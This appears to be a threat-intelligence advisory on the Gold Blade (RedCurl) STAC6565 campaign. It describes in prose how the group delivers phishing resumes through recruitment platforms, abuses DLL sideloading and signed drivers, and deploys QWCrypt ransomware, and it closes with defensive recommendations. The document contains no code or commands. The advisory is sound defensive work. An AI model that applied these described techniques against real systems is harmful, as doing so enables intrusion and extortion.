The STAC6565 threat cluster, associated with the financially motivated hacking group Gold Blade (also tracked as Earth Kapre, RedCurl, and Red Wolf), has been actively targeting organizations since late 2018, with a recent campaign focusing heavily on Canadian entities (80% of attacks). This group has evolved from cyber espionage to a hybrid operation combining data theft with ransomware deployment using a custom ransomware strain named QWCrypt. Initial infection vectors rely on spear-phishing emails targeting HR personnel, exploiting legitimate job recruitment platforms such as Indeed, JazzHR, and ADP WorkforceNow to host weaponized resumes and cover letters. These documents contain multi-stage payloads delivered via sophisticated chains involving Windows shortcuts (LNK files) masquerading as PDFs, which execute via rundll32.exe and sideload malicious DLLs from attacker-controlled WebDAV servers behind Cloudflare Workers domains. The malware uses legitimate Windows tools like Program Compatibility Assistant (pcalua.exe) to execute payloads, enhancing stealth. The RedLoader loader collects extensive Active Directory environment data and communicates with multiple command-and-control servers using tools like RPivot and Chisel SOCKS5 proxies. The attackers employ a customized Terminator tool leveraging a signed Zemana AntiMalware driver to perform BYOVD attacks, disabling antivirus processes. Post-compromise, the attackers conduct system discovery using Sysinternals AD Explorer and package stolen data into encrypted archives sent to attacker-controlled servers. Ransomware deployment scripts are victim-specific and include steps to disable recovery features, delete shadow copies, and erase PowerShell history to hinder forensic analysis. Notably, the ransomware targets endpoint devices and hypervisors, amplifying impact by potentially encrypting virtual machine volumes. The group operates in bursts with periods of dormancy, indicating ongoing toolset refinement. Despite the high sophistication, no evidence suggests state sponsorship or political motives, and the group operates under a hack-for-hire model, performing tailored intrusions for clients while monetizing via ransomware. The campaign's use of legitimate platforms and advanced evasion techniques poses significant detection challenges.

European organizations face considerable risk from this threat due to the group's expansion beyond Canada into countries including Germany, Norway, Slovenia, the U.K., and Ukraine. The hybrid nature of the attacks—combining espionage, data theft, and ransomware—threatens confidentiality, integrity, and availability of critical systems. Target sectors such as manufacturing, technology, retail, transportation, and NGOs are vital to European economies and infrastructure, increasing potential disruption and financial losses. The ransomware's ability to target hypervisors elevates risk by compromising virtualized environments, potentially causing widespread service outages and data loss. The use of legitimate recruitment platforms for initial compromise complicates detection and increases the likelihood of successful intrusions. Additionally, the group's use of BYOVD attacks to disable antivirus solutions reduces the effectiveness of traditional endpoint defenses. The tailored nature of ransomware deployment and the deletion of recovery artifacts hinder incident response and forensic investigations. Overall, this threat could lead to significant operational disruption, data breaches, financial extortion, and reputational damage for European organizations.

European organizations should implement targeted defenses focusing on the attack vectors and tactics used by STAC6565/Gold Blade. Specifically, enhance email security by deploying advanced phishing detection solutions capable of analyzing attachments and URLs hosted on legitimate recruitment platforms. Implement strict controls and monitoring around HR and recruitment workflows, including sandboxing of incoming resumes and cover letters. Enforce multi-factor authentication (MFA) and strong password policies for all administrative and hypervisor accounts, and segregate hypervisor management networks from production and user networks. Deploy network segmentation to limit lateral movement and restrict SMB share access to authorized users only. Monitor for unusual use of Windows utilities such as rundll32.exe, pcalua.exe, and PowerShell scripts, and establish behavioral analytics to detect anomalous activity related to these processes. Utilize endpoint detection and response (EDR) tools capable of identifying BYOVD techniques and unauthorized driver loading. Regularly back up critical data and verify backup integrity, ensuring backups are isolated from the network to prevent ransomware encryption. Conduct threat hunting exercises focused on indicators of compromise related to RedLoader, QWCrypt, and associated C2 infrastructure. Finally, educate HR personnel about spear-phishing risks and the dangers of interacting with unsolicited resumes or job applications, especially those hosted on external platforms.